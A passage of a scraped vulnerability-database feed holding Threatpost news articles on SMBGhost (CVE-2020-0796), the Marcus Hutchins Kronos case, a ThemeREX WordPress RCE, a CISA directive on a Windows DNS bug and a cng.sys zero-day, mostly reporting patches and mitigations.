market.\n\nHutchins filed a [plea agreement](<https://www.documentcloud.org/documents/5972658-Marcus-Hutchins-plea-agreement.html>) in April pleading guilty to charges relating to the creation of the Kronos malware. The [plea agreement ](<https://threatpost.com/wannacry-hero-pleads-guilty-to-kronos-malware-charges/143997/>)admitted guilt to two of 10 counts in the Eastern District of Wisconsin on Friday \u2013 one charge for distributing Kronos and the other charge for conspiracy.\n\nOn the heels of his plea agreement, Hutchins faced up to 10 years in prison and $500,000 in fines, according to court documents.\n\nAfter Hutchins was first detained August 2017 in Nevada \u2013 a week after attending Black Hat and DEF CON \u2013 [reaction](<https://threatpost.com/marcus-hutchins-only-certainty-is-uncertainty/127270/>) to his arrest was mixed. The U.K. malware researcher has been hailed by many as the so-called \u201cWannaCry Hero\u201d because he discovered a way to knock down the WannaCry [ransomware](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>) just as it had started to rapidly spread, infecting at least 200,000 systems and bringing global businesses to a halt.\n\nHutchins was hailed as a hero during the global [WannaCry outbreak in 2017](<https://threatpost.com/wannacry-bitcoin-withdrawn-killswitch-researcher-detained-in-nevada/127182/>). His analysis of the ransomware uncovered a hardcoded killswitch domain that the malware beaconed out to. Hutchins\u2019 purchased the domain for around $10 and by doing so likely spared the U.S. from suffering significant impact at the hands of WannaCry.\n\nWannaCry is blamed for infecting more than 200,000 endpoints in 150 countries, causing billions of dollars in damages and grinding global business to a halt.\n", "cvss3": {}, "published": "2019-07-29T13:23:34", "type": "threatpost", "title": "\u2018WannaCry Hero\u2019 Avoids Jail Time in Kronos Malware Charges", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2019-07-29T13:23:34", "id": "THREATPOST:12364EEB82CF1DBF8D357DF9FBB64126", "href": "https://threatpost.com/wannacry-hero-avoids-jail-time-in-kronos-malware-charges/146721/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-13T13:12:19", "description": "UPDATE\n\nMicrosoft released an emergency out-of-band patch to fix a SMBv3 wormable bug on Thursday that leaked earlier this week. The a patch for the vulnerability, tracked as CVE-2020-0796, is now rolling out to Windows 10 and Windows Server 2019 systems worldwide, according to Microsoft.\n\nOn Wednesday Microsoft warned of a wormable, unpatched remote code-execution vulnerability in the Microsoft Server Message Block protocol \u2013 the same protocol that was targeted by the infamous WannaCry ransomware in 2017. Microsoft released its fix, [KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>), the following day as an update for Windows 10 (versions 1903 and 1909) and Windows Server 2019 (versions 1903 and 1909).\n\nThe critical bug affects Windows 10 and Windows Server 2019, and was not included in Microsoft\u2019s [Patch Tuesday release](<https://threatpost.com/microsoft-patches-bugs-march-update/153597/>) this week.\n\nThe bug can be found in version 3.1.1 of Microsoft\u2019s SMB file-sharing system. SMB allows multiple clients to access shared folders and can provide a rich playground for malware when it comes to lateral movement and client-to-client infection. This was played out in version 1 of SMB back in 2017, when the [WannaCry ransomware](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>) used the NSA-developed [EternalBlue SMB exploit](<https://threatpost.com/scanner-shows-eternalblue-vulnerability-unpatched-on-thousands-of-machines/126818/>) to self-propagate rapidly around the world.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn this case, \u201cto exploit the vulnerability against an SMB server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 server,\u201d Microsoft explained [in its advisory](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200005#ID0EN>), issued Wednesday. \u201cTo exploit the vulnerability against an SMB client, an unauthenticated attacker would need to configure a malicious SMBv3 server and convince a user to connect to it.\u201d\n\nMicrosoft issued its advisory only after details of the bug were published online by Cisco Talos and Fortinet. The firms\u2019 disclosure was an apparent miscommunication with Microsoft \u2013 both posts have since been taken down.\n\nAccording to [Duo Security](<https://duo.com/decipher/microsoft-advisory-warns-of-smbv3-flaw>), Fortinet had described the issue as a \u201cBuffer Overflow Vulnerability in Microsoft SMB Servers\u201d and said it could be used to execute arbitrary code within the context of the application. Cisco Talos meanwhile warned that a \u201cwormable\u201d attack would be able to exploit the vulnerability to \u201cmove from victim to victim.\u201d\n\nThreatpost reached out to both firms for additional details. Cisco Talos told Threatpost, \u201cOn March 10, information on an in-process effort was inadvertently posted and then promptly deleted from the Talos blog because it was not finalized. As a matter of policy, we do not discuss research that has not yet been approved for public disclosure. We are aware that this may have caused some confusion and will follow up when we have more to offer.\u201d\n\nWhile the bug is dangerous, researchers said this bug likely won\u2019t lead to \u201cWannaCry 2.0.\u201d\n\n\u201cConsidering that SMBv3 is not as widely used as SMBv1, the potential immediate impact of this threat is most likely lower than past vulnerabilities,\u201d Richard Melick, senior technical product manager at Automox, told Threatpost. \u201cBut that does not mean organizations should be disregarding any endpoint hardening that can happen now while Microsoft works on a patch\u2026it\u2019s better to respond today and disable SMBv3 and block TCP port 445. Respond now and vulnerabilities end today.\u201d\n\nJake Williams, founder of security firm Rendition Security, [said on Twitter](<https://twitter.com/MalwareJake/status/1237512617817751552>) that the risk of exploitation is mitigated by kernel protections \u2013 specifically kernel address space layout randomization (KASLR). KASLR randomly arranges the address space positions of key data areas of a given process. It essentially means that an attacker can\u2019t establish one attack path and use it over and over again.\n\n\u201cCore SMB sits in kernel space and KASLR is great at mitigating exploitation,\u201d tweeted Williams. \u201cAssuming this is kernel space, any unsuccessful exploitation results in [the blue screen of death] BSOD.\u201d He added, \u201cEven with trigger code, you still have to remotely bypass KASLR (not an easy task). If you need proof, [look at BUCKEYE](<https://symantec-blogs.broadcom.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit>). They had the EternalBlue trigger, but had to chain it with another information disclosure vulnerability to gain code execution. This isn\u2019t easy.\u201d\n\nSo far, there\u2019s no evidence that the vulnerability had been exploited in the wild, Microsoft said in the advisory. However, Melick said to proceed with caution.\n\n\u201cThere are still too many unknowns to say how effective this wormable vulnerability could be; is it going to be as easy as EternalBlue to implement or will it have the same difficulties as BlueKeep?\u201d Melick noted \u2013 the latter in reference to the [wormable bug](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>) disclosed last year that some feared would lead to another WannaCry-level event. Exploits for BlueKeep however have so far [fallen well short](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>) of researchers\u2019 initial fears.\n\nIn lieu of a patch, Microsoft on Wednesday noted that administrators can use PowerShell to disable SMBv3 compression, which will block unauthenticated attackers from exploiting the vulnerability against an SMBv3 server.\n\nTo protect clients from outside attacks, it\u2019s necessary to block TCP port 445 at the enterprise perimeter firewall.\n\n\u201cTCP port 445 is used to initiate a connection with the affected component,\u201d Microsoft noted. \u201cBlocking this port at the network perimeter firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. This can help protect networks from attacks that originate outside the enterprise perimeter. Blocking the affected ports at the enterprise perimeter is the best defense to help avoid internet-based attacks.\u201d\n\nHowever, systems could still be vulnerable to attacks from within the enterprise perimeter \u2013 so once attackers penetrate the corporate network, they could use an exploit to move around in an unfettered way. Microsoft has published [general guidelines](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>) to prevent lateral connections.\n\n**_Interested in security for the Internet of Things and how 5G will change things? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n\n_(This article was updated March 12 with the news that Microsoft has released a patch for CVE-2020-0796)_\n", "cvss3": {}, "published": "2020-03-11T17:13:53", "type": "threatpost", "title": "Wormable, Unpatched Microsoft Bug Threatens Corporate LANs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-11T17:13:53", "id": "THREATPOST:EC36CC2F4E891C402B4EBDBE9D92F9A8", "href": "https://threatpost.com/wormable-unpatched-microsoft-bug/153632/?utm_source=rss&utm_medium=rss&utm_campaign=wormable-unpatched-microsoft-bug", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-28T20:46:14", "description": "More than 100,000 Windows systems have not yet been updated to protect against a previously-patched, critical and wormable flaw in Windows called SMBGhost.\n\nMicrosoft patched the remote code-execution (RCE) flaw bug tracked as [CVE-2020-0796 back in March](<https://threatpost.com/wormable-unpatched-microsoft-bug/153632/>); it affects Windows 10 and Windows Server 2019, and ranks 10 out of 10 on the CVSS scale. It exists in version 3.1.1 of the Microsoft Server Message Block (SMB) protocol, the same protocol that was targeted by the infamous [WannaCry ransomware](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>) in 2017.\n\n\u201cI\u2019m unsure what method Shodan uses to determine whether a certain machine is vulnerable to SMBGhost, but if its detection mechanism is accurate, it would appear that there are still over 103,000 affected machines accessible from the internet,\u201d Jan Kopriva, one of the researchers at the SANS Internet Storm Center, said in a [post on Wednesday](<https://isc.sans.edu/forums/diary/SMBGhost+the+critical+vulnerability+many+seem+to+have+forgotten+to+patch/26732/>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAccording to Kopriva, many of these vulnerable systems (22 percent) are in Taiwan, Japan (20 percent), Russia (11 percent) and the U.S. (9 percent).\n\nMicrosoft released its fix, KB4551762, as an update for Windows 10 (versions 1903 and 1909) and Windows Server 2019 (versions 1903 and 1909).\n\nIn lieu of a patch, Microsoft in March had noted that administrators can use PowerShell to disable SMBv3 compression, which will block unauthenticated attackers from exploiting the vulnerability against an SMBv3 server. To protect clients from outside attacks, it\u2019s necessary to block TCP port 445 at the enterprise perimeter firewall. Kopriva for his part also tracked a percentage of all IPs with an open port 445 via Shodan, and found that overall approximately 8 percent of all IPs have port 445 open.\n\nThe chart below shows the number of vulnerable systems that are open to SMBGhost. Kopriva noted in a message to Threatpost that the \u201cdips\u201d in the data are presumably caused by Shodan re-scanning a large number of IP ranges.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/28154313/0-1.png>)\n\nIP addresses detected as vulnerable to SMBGhost by Shodan. Credit: Jan Kopriva\n\nThe pressure is on for system administrators to patch their systems against SMBGhost, with various proof of concepts (PoCs) for the flaw being released over the past few months. While many attempts to exploit SMBGhost resulted only in denial of service or local privilege escalation, a PoC released in June by someone who goes by \u201cChompie,\u201d who announced [his exploit](<https://github.com/chompie1337/SMBGhost_RCE_PoC/blob/master/README.md>) to achieve RCE on Twitter.\n\n\u201cSince release of this PoC was again met with wide attention from the media, one might reasonably expect that by now, most of the vulnerable machines would have been patched \u2013 especially those accessible from the internet,\u201d according to Kopriva.\n\nThese PoCs have also [spurred the Department of Homeland Security](<https://techxplore.com/news/2020-06-homeland-windows-worm.html>) to urge companies to update in June, saying that cybercriminals are targeting the unpatched systems: The agency \u201cstrongly recommends using a firewall to block server message block ports from the internet and to apply patches to critical- and high-severity vulnerabilities as soon as possible.\u201d\n", "cvss3": {}, "published": "2020-10-28T20:36:09", "type": "threatpost", "title": "Microsoft\u2019s SMBGhost Flaw Still Haunts 108K Windows Systems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-10-28T20:36:09", "id": "THREATPOST:38C104BCE62E9E24AEFF60D68D7C50BE", "href": "https://threatpost.com/microsofts-smbghost-flaw-108k-windows-systems/160682/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-11T18:04:34", "description": "A critical vulnerability in a WordPress plugin known as \u201cThemeREX Addons\u201d could open the door for remote code execution in tens of thousands of websites. According to Wordfence, the bug has been actively exploited in the wild as a zero-day.\n\nThe plugin, which is installed on approximately 44,000 sites, is used to apply various \u201cskins\u201d that govern the look and feel of web destinations, including theme-enhancing features and widgets.\n\nTo provide compatibility with WordPress\u2019 Gutenberg plugin, the ThemeREX Addons plugin uses an API, according to Wordfence researcher Chloe Chamberland, writing in [a blog posting](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) on Monday. When the API interacts with Gutenberg, the touchpoints of that communication are known as endpoints. ThemeREX uses the \u201c~/includes/plugin.rest-api.php\u201d file to register an endpoint (\u201c/trx_addons/v2/get/sc_layout\u201d), which in turn calls the \u201ctrx_addons_rest_get_sc_layout\u201d function.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThis introduces an access-control problem, the researcher noted. In unpatched versions of ThemeREX, \u201cthere were no capability checks on this endpoint that would block users that were not administrators or currently signed in, so any user had the ability to call the endpoint regardless of capability,\u201d she explained. \u201cIn addition, there was no nonce check to verify the authenticity of the source.\u201d\n\nFurther down in the code, there\u2019s also a functionality used to get parameters from widgets that work with the Gutenberg plugin.\n\n\u201cThis is where the core of the remote code execution vulnerability was present,\u201d Chamberland wrote. \u201cThere were no restrictions on the PHP functions that could be used or the parameters that were provided as input. Instead, we see a simple if (function_exists($sc)) allowing for any PHP function to be called and executed.\u201d\n\nThe upshot of this is that adversaries can use various WordPress functions \u2013 for instance, in attacks in the wild, the \u201cwp_insert_user\u201d function was used to create administrative user accounts and take over sites, according to the research.\n\nThemeREX has now addressed the issue by completely removing the affected ~/plugin.rest-api.php file from the plugin \u2013 users should update to the latest version to stay protected.\n\nWordPress plugins continue to be a rich avenue of attack for cybercriminals. Last month, popular WordPress plugin Duplicator, which has more than 1 million active installations, [was discovered to have](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) an unauthenticated arbitrary file download vulnerability that was being attacked.\n\nAnd, earlier in February a critical flaw in a popular WordPress plugin that helps make websites compliant with the General Data Protection Regulation (GDPR) [was disclosed](<https://threatpost.com/critical-wordpress-plugin-bug-afflicts-700k-sites/152871/>); it could enable attackers to modify content or inject malicious JavaScript code into victim websites. It affected 700,000 sites.\n\n**_Interested in security for the Internet of Things and how 5G will change things? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-10T20:30:36", "type": "threatpost", "title": "Popular ThemeREX WordPress Plugin Opens Websites to RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-10T20:30:36", "id": "THREATPOST:F7C6EEE7081716FAE624B70FD91C4225", "href": "https://threatpost.com/themerex-wordpress-plugin-remote-code-execution/153592/?utm_source=rss&utm_medium=rss&utm_campaign=themerex-wordpress-plugin-remote-code-execution", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-07-17T21:59:13", "description": "The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is ordering all federal executive branch offices to apply a patch for a wormable Windows Server bug within 24 hours, warning of a \u201chigh potential for compromise of agency information systems.\u201d\n\nIn an [Emergency Directive](<https://cyber.dhs.gov/ed/20-03/>), the Department of Homeland Security (DHS) agency ordered the \u201cFederal Civilian Executive Branch\u201d to apply a patch Microsoft released Tuesday for the vulnerability, ([CVE-2020-1350](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350>)), by 2:00 pm ET Friday.\n\n\u201cCISA has determined that this vulnerability poses unacceptable significant risk to the Federal Civilian Executive Branch and requires an immediate and emergency action,\u201d the agency said in the directive. \n[](<https://threatpost.com/newsletter-sign/>)\n\nSpecifically, the directive requires that by the deadline, all of the aforementioned agencies do the following: \u201cUpdate all endpoints running Windows Server operating systems; ensure the July 2020 Security Update or registry modification workaround is applied to all Windows Servers running the DNS role; ensure the July 2020 Security Update is applied to all Windows Servers and, if necessary and applicable, the registry change workaround is removed; and ensure technical and/or management controls are in place to ensure newly provisioned or previously disconnected servers are updated before connecting to agency networks.\u201d\n\nWhile there is no evidence of current active exploitation of the vulnerability, the CISA based its warning on \u201cthe likelihood of the vulnerability being exploited\u201d as well as \u201cthe widespread use of the affected software across the Federal enterprise,\u201d and \u201cthe grave impact of a successful compromise,\u201d according to the directive.\n\nThe CISA emergency directive includes:\n\n * By 2:00 pm EDT, Friday, July 17, 2020, ensure the July 2020 Security Update or registry modification workaround is applied to all Windows Servers running the DNS role.\n * By 2:00 pm EDT, Friday, July 24, 2020, ensure the July 2020 Security Update is applied to all Windows Servers and, if necessary and applicable, the registry change workaround is removed.\n * By 2:00 pm EDT, Friday, July 24, 2020, ensure technical and/or management controls are in place to ensure newly provisioned or previously disconnected servers are updated before connecting to agency networks.\n\nThe agency recommends taking equipment offline if it can\u2019t be patched before the CISA deadline.\n\nThe vulnerability, a DNS flaw, was one of 123 bugs Microsoft patch in [July\u2019s Patch Tuesday](<https://threatpost.com/microsoft-tackles-123-fixes-july-patch-tuesday/157440/>), the fifth month in a row the company patched more than 100 vulnerabilities.\n\nCVE-2020-1350 is a remote code-execution vulnerability in the Windows Domain Name System (DNS) Server that was initially [discovered by Sagi Tzaik](<https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/>), a researcher at Check Point. That bug exists due to the improper handling of requests sent to Windows DNS servers, according to researchers.\n\n\u201cA remote, unauthenticated attacker could exploit this vulnerability by sending a malicious request to a vulnerable Windows DNS server,\u201d wrote Satnam Narang, staff research engineer at Tenable, in the company\u2019s [Patch Tuesday analysis](<https://www.tenable.com/blog/microsoft-s-july-2020-patch-tuesday-addresses-123-cves-including-wormable-windows-dns-server>). \u201cSuccessful exploitation would allow the attacker to execute arbitrary code under the local system account context,\u201d\n\nMoreover, the vulnerability is wormable, which means it could spread from computer to computer without user interaction, making it all the more dangerous, he said.\n\nAlthough Emergency Directive 20-03 applies only to certain Executive Branch departments and agencies, the CISA also strongly recommends that all state and local governments, the private sector, and others patch this critical vulnerability as soon as possible.\n\nThe CISA has had its hands full lately warning on the exploit likelihood and danger of critical vulnerabilities that have either been discovered or patched in widely used hardware and software.\n\nOn July 14, the CISA [warned](<https://threatpost.com/critical-sap-bug-enterprise-system-takeover/157392/>) of a critical vulnerability for SAP customers, the successful exploitation of which could open the door for attackers to read and modify financial records; change banking details; read personal identifiable information (PII); and engage in other numerous types of disruptive behavior.\n\nA week before that, the agency urged all administrators to [implement an urgent patch](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>) for a critical vulnerability in F5 Networks\u2019 networking devices, which is being actively exploited by attackers to scrape credentials, launch malware and more.\n\nThe CISA also [warned](<https://threatpost.com/cisa-nation-state-attackers-palo-alto-networks-bug/157013/>) June 30 that foreign hackers were likely to exploit a critical vulnerability, CVE-2020-2021, in a raft of Palo Alto Networks firewalls and enterprise VPN appliances, ordering agencies to patch all affected devices.\n", "cvss3": {}, "published": "2020-07-17T15:43:00", "type": "threatpost", "title": "CISA Emergency Directive Orders Immediate Fix of Windows DNS Server Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1350", "CVE-2020-2021"], "modified": "2020-07-17T15:43:00", "id": "THREATPOST:363C332F7046A481C24C7172C55CF758", "href": "https://threatpost.com/cisa-emergency-directive-orders-immediate-fix-of-windows-dns-server-bug/157529/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-02T15:57:19", "description": "A high-severity Windows driver bug is being exploited in the wild as a zero-day. It allows local privilege escalation and sandbox escape.\n\nThe security vulnerability [was disclosed](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2104>) by Google Project Zero just seven days after it was reported, since cybercriminals are already exploiting it, according to researchers.\n\nThe flaw (CVE-2020-17087) has to do with the way the Windows Kernel Cryptography Driver (cng.sys) processes input/output control (IOCTL), which is a system call for device-specific input/output operations and other operations that cannot be expressed by regular system calls.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201c[Cng.sys] exposes a \\Device\\CNG device to user-mode programs and supports a variety of IOCTLs with non-trivial input structures,\u201d according to the bug report, published on Friday. \u201cWe have identified a vulnerability in the processing of IOCTL 0x390400, reachable through [a] series of calls.\u201d\n\nWith specially crafted requests, an attacker can trigger a pool-based buffer overflow, which leads to a system crash and opens the door for exploitation.\n\n\u201cThe bug resides in the cng!CfgAdtpFormatPropertyBlock function and is caused by a 16-bit integer truncation issue,\u201d the Project Zero team explained. \u201cThe integer overflow occurs in line 2, and if SourceLength is equal to or greater than 0x2AAB, an inadequately small buffer is allocated from the NonPagedPool in line 3. It is subsequently overflown by the binary-to-hex conversion loop in lines 5-10 by a multiple of 65536 bytes.\u201d\n\nThe team put together a proof-of-concept exploit that shows the ease of triggering an attack. It worked on an up-to-date build of Windows 10 1903 (64-bit), but researchers said that the bug appears to affect Windows versions going back to Windows 7.\n\n\u201cA crash is easiest to reproduce with Special Pools enabled for cng.sys, but even in the default configuration the corruption of 64kB of kernel data will almost surely crash the system shortly after running the exploit,\u201d according to Project Zero.\n\nThe director of Google\u2019s Threat Analysis Group, Shane Huntley, said in the disclosure that the attacks are targeted and unrelated to any U.S. election-related targeting. Another Project Zero team member noted that Microsoft is expected to fix the bug on its next Patch Tuesday update, on Nov. 10.\n\nSome quibbled with the short disclosure timeline, but Project Zero researchers Ben Hawkes and Tavis Ormandy defended the move on Twitter:\n\n> The quick take: we think there's defensive utility to sharing these details, and that opportunistic attacks using these details between now and the patch being released is reasonable unlikely (so far it's been used as part of an exploit chain, and the entry-point attack is fixed)\n> \n> \u2014 Ben Hawkes (@benhawkes) [October 30, 2020](<https://twitter.com/benhawkes/status/1322211779028557824?ref_src=twsrc%5Etfw>)\n\nOrmandy [noted](<https://twitter.com/taviso/status/1322219253878026241>), \u201cYour attack is more likely to be detected if you attempt to use documented vulnerabilities, because people know what to look for. The other details of your attack will then be analyzed.\u201d\n\nMateusz Jurczyk and Sergei Glazunov of Google Project Zero were credited with finding the bug.\n\n**Hackers Put Bullseye on Healthcare: [On Nov. 18 at 2 p.m. EDT](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) find out why hospitals are getting hammered by ransomware attacks in 2020. [Save your spot for this FREE webinar](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>) on healthcare cybersecurity priorities and hear from leading security voices on how data security, ransomware and patching need to be a priority for every sector, and why. Join us Wed., Nov. 18, 2-3 p.m. EDT for this [LIVE](<https://threatpost.com/webinars/2020-healthcare-cybersecurity-priorities-data-security-ransomware-and-patching/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_webinar>), limited-engagement webinar.**\n", "cvss3": {}, "published": "2020-11-02T14:57:02", "type": "threatpost", "title": "Unpatched Windows Zero-Day Exploited in the Wild for Sandbox Escape", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796", "CVE-2020-17087"], "modified": "2020-11-02T14:57:02", "id": "THREATPOST:2AAD8D184B893593E4E3B11FE31F97B3", "href": "https://threatpost.com/unpatched-windows-zero-day-exploited-sandbox-escape/160828/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:27:36", "description": "UPDATE\n\nMicrosoft released an emergency out-of-band patch to fix a SMBv3 wormable bug on Thursday that leaked earlier this week. The a patch for the vulnerability, tracked as CVE-2020-0796, is now rolling out to Windows 10 and Windows Server 2019 systems worldwide, according to Microsoft.\n\nOn Wednesday Microsoft warned of a wormable, unpatched remote code-execution vulnerability in the Microsoft Server Message Block protocol \u2013 the same protocol that was targeted by the infamous WannaCry ransomware in 2017. Microsoft released its fix, [KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>), the following day as an update for Windows 10 (versions 1903 and 1909) and Windows Server 2019 (versions 1903 and 1909).\n\nThe critical bug affects Windows 10 and Windows Server 2019, and was not included in Microsoft\u2019s [Patch Tuesday release](<https://threatpost.com/microsoft-patches-bugs-march-update/153597/>) this week.\n\nThe bug can be found in version 3.1.1 of Microsoft\u2019s SMB file-sharing system. SMB allows multiple clients to access shared folders and can provide a rich playground for malware when it comes to lateral movement and client-to-client infection. This was played out in version 1 of SMB back in 2017, when the [WannaCry ransomware](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>) used the NSA-developed [EternalBlue SMB exploit](<https://threatpost.com/scanner-shows-eternalblue-vulnerability-unpatched-on-thousands-of-machines/126818/>) to self-propagate rapidly around the world.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn this case, \u201cto exploit the vulnerability against an SMB server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 server,\u201d Microsoft explained [in its advisory](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200005#ID0EN>), issued Wednesday. \u201cTo exploit the vulnerability against an SMB client, an unauthenticated attacker would need to configure a malicious SMBv3 server and convince a user to connect to it.\u201d\n\nMicrosoft issued its advisory only after details of the bug were published online by Cisco Talos and Fortinet. The firms\u2019 disclosure was an apparent miscommunication with Microsoft \u2013 both posts have since been taken down.\n\nAccording to [Duo Security](<https://duo.com/decipher/microsoft-advisory-warns-of-smbv3-flaw>), Fortinet had described the issue as a \u201cBuffer Overflow Vulnerability in Microsoft SMB Servers\u201d and said it could be used to execute arbitrary code within the context of the application. Cisco Talos meanwhile warned that a \u201cwormable\u201d attack would be able to exploit the vulnerability to \u201cmove from victim to victim.\u201d\n\nThreatpost reached out to both firms for additional details. Cisco Talos told Threatpost, \u201cOn March 10, information on an in-process effort was inadvertently posted and then promptly deleted from the Talos blog because it was not finalized. As a matter of policy, we do not discuss research that has not yet been approved for public disclosure. We are aware that this may have caused some confusion and will follow up when we have more to offer.\u201d\n\nWhile the bug is dangerous, researchers said this bug likely won\u2019t lead to \u201cWannaCry 2.0.\u201d\n\n\u201cConsidering that SMBv3 is not as widely used as SMBv1, the potential immediate impact of this threat is most likely lower than past vulnerabilities,\u201d Richard Melick, senior technical product manager at Automox, told Threatpost. \u201cBut that does not mean organizations should be disregarding any endpoint hardening that can happen now while Microsoft works on a patch\u2026it\u2019s better to respond today and disable SMBv3 and block TCP port 445. Respond now and vulnerabilities end today.\u201d\n\nJake Williams, founder of security firm Rendition Security, [said on Twitter](<https://twitter.com/MalwareJake/status/1237512617817751552>) that the risk of exploitation is mitigated by kernel protections \u2013 specifically kernel address space layout randomization (KASLR). KASLR randomly arranges the address space positions of key data areas of a given process. It essentially means that an attacker can\u2019t establish one attack path and use it over and over again.\n\n\u201cCore SMB sits in kernel space and KASLR is great at mitigating exploitation,\u201d tweeted Williams. \u201cAssuming this is kernel space, any unsuccessful exploitation results in [the blue screen of death] BSOD.\u201d He added, \u201cEven with trigger code, you still have to remotely bypass KASLR (not an easy task). If you need proof, [look at BUCKEYE](<https://symantec-blogs.broadcom.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit>). They had the EternalBlue trigger, but had to chain it with another information disclosure vulnerability to gain code execution. This isn\u2019t easy.\u201d\n\nSo far, there\u2019s no evidence that the vulnerability had been exploited in the wild, Microsoft said in the advisory. However, Melick said to proceed with caution.\n\n\u201cThere are still too many unknowns to say how effective this wormable vulnerability could be; is it going to be as easy as EternalBlue to implement or will it have the same difficulties as BlueKeep?\u201d Melick noted \u2013 the latter in reference to the [wormable bug](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>) disclosed last year that some feared would lead to another WannaCry-level event. Exploits for BlueKeep however have so far [fallen well short](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>) of researchers\u2019 initial fears.\n\nIn lieu of a patch, Microsoft on Wednesday noted that administrators can use PowerShell to disable SMBv3 compression, which will block unauthenticated attackers from exploiting the vulnerability against an SMBv3 server.\n\nTo protect clients from outside attacks, it\u2019s necessary to block TCP port 445 at the enterprise perimeter firewall.\n\n\u201cTCP port 445 is used to initiate a connection with the affected component,\u201d Microsoft noted. \u201cBlocking this port at the network perimeter firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. This can help protect networks from attacks that originate outside the enterprise perimeter. Blocking the affected ports at the enterprise perimeter is the best defense to help avoid internet-based attacks.\u201d\n\nHowever, systems could still be vulnerable to attacks from within the enterprise perimeter \u2013 so once attackers penetrate the corporate network, they could use an exploit to move around in an unfettered way. Microsoft has published [general guidelines](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>) to prevent lateral connections.\n\n**_Interested in security for the Internet of Things and how 5G will change things? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n\n_(This article was updated March 12 with the news that Microsoft has released a patch for CVE-2020-0796)_\n", "cvss3": {}, "published": "2020-03-11T17:13:53", "type": "threatpost", "title": "Wormable, Unpatched Microsoft Bug Threatens Corporate LANs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796", "CVE-2020-5135"], "modified": "2020-03-11T17:13:53", "id": "THREATPOST:0EAD358006302B8EB3637C22334E13DC", "href": 